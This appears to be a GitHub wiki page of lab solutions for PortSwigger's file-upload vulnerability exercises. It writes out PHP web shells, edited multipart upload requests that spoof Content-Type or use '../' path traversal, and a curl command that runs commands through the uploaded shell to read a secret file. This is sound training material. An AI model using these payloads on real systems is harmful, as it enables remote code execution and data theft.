File upload vulnerabilities - gachikuku/portswigger GitHub Wiki

Apprentice lab:
Remote code execution via web shell upload

This lab contains a vulnerable image upload function. It doesn't perform any validation on the files users upload before storing them on the server's filesystem.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload a sample image. (1px ideally).
    3. Locate the file that has been uploaded. (i.e. files/avatars/image.png)
    4. Analyse the POST request made and the GET request of the image.
    5. Change the POST request and see it reflect to the GET request.
    6. Read secret and submit.

Apprentice lab:
Web shell upload via Content-Type restriction bypass

This lab contains a vulnerable image upload function. It attempts to prevent users from uploading unexpected file types, but relies on checking user-controllable input to verify this.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload a sample image. (1px ideally).
    3. Locate the file that has been uploaded. (i.e. files/avatars/image.png)
    4. Analyse the POST request made and the GET request of the image.
    5. Duplicate the POST /my-account/avatar request.
    6. On a duplicated POST request press ea to open and edit the request body.
    7. Edit the binary file
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="avatar"; filename="exploit.php"
      - Content-Type: text/plain
      + Content-Type: image/png
      
        <?php echo file_get_contents('/home/carlos/secret'); ?>
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="user"
      
        wiener
        -----------------------------110021003736074269862781810296
        Content-Disposition: form-data; name="csrf"
      
        XdvzQpIziILt34TaP4GY1nLyFeFXhMhR
        -----------------------------110021003736074269862781810296--
    8. Visit /files/avatars/exploit.php.

Practitioner lab:
Web shell upload via path traversal

This lab contains a vulnerable image upload function. The server is configured to prevent execution of user-supplied files, but this restriction can be bypassed by exploiting a secondary vulnerability.
To solve the lab, upload a basic PHP web shell and use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter

  • Solution

    1. Log in as wiener:peter.
    2. Upload an sample image.
    3. Right click to the uploaded image to find out where it was uploaded /files/avatars/image.png.
    4. Duplicate the POST request to upload a webshell <?php system($_GET['cmd']); ?>.
    5. ea to open and edit the request-body.
        -----------------------------33535606952856614791034043163
      - Content-Disposition: form-data; name="avatar"; filename="image.php"
      + Content-Disposition: form-data; name="avatar"; filename="../image.php"
        Content-Type: image/png
      
        <?php system($_GET['cmd']); ?>
        -----------------------------33535606952856614791034043163
        Content-Disposition: form-data; name="user"
      
        wiener
        -----------------------------33535606952856614791034043163
        Content-Disposition: form-data; name="csrf"
      
        k6OY4oqfcG4TmjX5toKp6DmEgUiW8cBi
        -----------------------------33535606952856614791034043163--
    6. Notice the GET request of the uploaded image endpoint does not reflect a change
    7. Trying stuff is encouraged. ..%2Fimage.php works!
    8. Verify we have a shell upload with
      curl "https://uuid.web-security-academy.net/files/avatars/../image.php?cmd=whoami"
    9. Exfiltrate flag with cmd=cat%20/home/carlos/secret.

Practitioner lab:


⚠️ **GitHub.com Fallback** ⚠️